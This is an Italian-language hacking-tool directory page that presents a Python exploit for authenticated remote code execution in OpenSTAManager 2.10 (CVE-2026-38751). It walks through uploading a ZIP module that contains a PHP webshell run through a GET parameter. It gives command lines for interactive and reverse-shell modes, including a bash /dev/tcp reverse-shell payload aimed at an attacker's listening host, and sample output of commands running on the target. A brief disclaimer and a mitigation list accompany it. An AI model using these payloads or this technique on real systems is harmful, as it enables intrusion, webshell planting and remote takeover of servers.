Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE Exploit (CVE-2026-38751) | Kitploit
Strumenti/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoGenerazione di Shellcode
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

Vedi Repository
11 mese faNon ancora revisionato

Exploit RCE per OpenSTAManager (CVE-2026-38751)

Panoramica

Questo script Python sfrutta una vulnerabilità di Remote Code Execution in OpenSTAManager versione 2.10, identificata come CVE-2026-38751. L'exploit consente agli utenti autenticati di caricare un modulo dannoso ed eseguire comandi arbitrari sul sistema target.

Dettagli della Vulnerabilità

  • CVE ID: CVE-2026-38751
  • Prodotto: OpenSTAManager
  • Versione: 2.10
  • Tipo: Remote Code Execution (RCE)
  • Vettore di attacco: Basato sul web, richiede autenticazione valida

Come Funziona l'Exploit

L'exploit segue questi passaggi:

  1. Autenticazione: Accede all'applicazione OpenSTAManager utilizzando le credenziali fornite
  2. Abilitazione Aggiornamenti: Attiva la funzionalità di aggiornamento dei moduli, necessaria per l'exploit
  3. Creazione ZIP Dannoso: Genera un file ZIP contenente:
    • Un file di definizione del modulo (MODULE)
    • Uno script PHP shell (shell.php) che esegue comandi tramite il parametro GET c
  4. Caricamento Modulo: Carica lo ZIP dannoso tramite l'interfaccia di aggiornamento dei moduli
  5. Verifica dello Sfruttamento: Conferma che la shell sia accessibile e funzionante
  6. Esecuzione Comandi: Tramite:
    • Modalità shell interattiva per l'esecuzione manuale dei comandi
    • Connessione reverse shell per stabilire una connessione persistente

Prerequisiti

  • Python 3.x
  • Pacchetti Python richiesti: requests, zipfile
  • Credenziali admin valide per OpenSTAManager
  • Accesso di rete al sistema target

Utilizzo

Utilizzo Base

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password

Modalità Shell Interattiva

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --interactive

Modalità Reverse Shell

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

Argomenti

Dettagli Tecnici

Processo di Sfruttamento

  1. Autenticazione: Lo script effettua una richiesta di login all'endpoint di autenticazione dell'applicazione
  2. Abilitazione Aggiornamento Moduli: Invia una richiesta POST per abilitare la funzionalità di aggiornamento dei moduli
  3. Generazione ZIP: Crea un archivio ZIP con:
    • shell/MODULE: File di configurazione del modulo
    • shell/shell.php: Webshell PHP che esegue i comandi passati tramite il parametro GET c
  4. Processo di Caricamento: Utilizza dati multipart form per caricare lo ZIP dannoso sull'endpoint di aggiornamento dei moduli
  5. Verifica: Testa la shell caricata eseguendo un comando semplice come id per confermare che funzioni
  6. Esecuzione Comandi: Fornisce una shell interattiva o stabilisce una connessione reverse shell

Payload Utilizzati

L'exploit tenta diversi payload di reverse shell:

  • Bash reverse shell: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • Reverse shell Python tramite connessioni socket
  • Payload bash codificato in Base64
  • Reverse shell Netcat

Considerazioni sulla Sicurezza

⚠️ Disclaimer: Questo exploit è destinato esclusivamente a scopo educativo e a test di sicurezza autorizzati.

Valutazione dei Rischi

Questa vulnerabilità consente:

  • Esecuzione di codice arbitrario come utente del web server
  • Potenziale escalation dei privilegi
  • Accesso a dati sensibili memorizzati sul sistema
  • Possibile movimento laterale all'interno di una rete

Mitigazione

Per proteggersi da questa vulnerabilità:

  1. Aggiornare OpenSTAManager all'ultima versione
  2. Implementare controlli di autenticazione adeguati
  3. Limitare le capacità di caricamento dei file
  4. Monitorare attività sospette
  5. Applicare la segmentazione di rete

Output di Esempio

root@kitploit:~
[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

Riferimenti

  • Repository GitHub
  • Dettagli CVE

Licenza

Questo exploit è fornito esclusivamente a scopo educativo. L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicito permesso di test è illegale.

Scarica lo strumento
ArgomentoDescrizione
-u, --urlURL del target (obbligatorio)
-U, --userNome utente per l'autenticazione (obbligatorio)
-P, --passwordPassword per l'autenticazione (obbligatoria)
--interactiveEntra in modalità shell interattiva
--no-cleanupNon rimuovere i file shell dopo l'esecuzione
--lhostHost locale per la reverse shell
--lportPorta locale per la reverse shell